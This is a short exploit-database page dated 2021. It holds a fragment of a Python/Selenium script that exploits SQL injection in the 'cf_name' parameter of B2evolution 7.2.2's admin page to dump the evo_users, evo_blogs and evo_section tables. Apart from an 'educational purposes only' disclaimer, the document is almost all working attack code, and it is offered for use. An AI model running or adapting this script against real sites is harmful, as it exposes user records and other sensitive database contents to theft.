Exploits / Vulnerability Discovered : 2021-05-06 |
Type : webapps |
Platform : php
This exploit / vulnerability B2evolution 722 cf_name sql injection is for educational purposes only and if it is used you will do on your own risk!
# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
browser.close()
print("At the time, of the exploit, you had to see information about the
tables...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")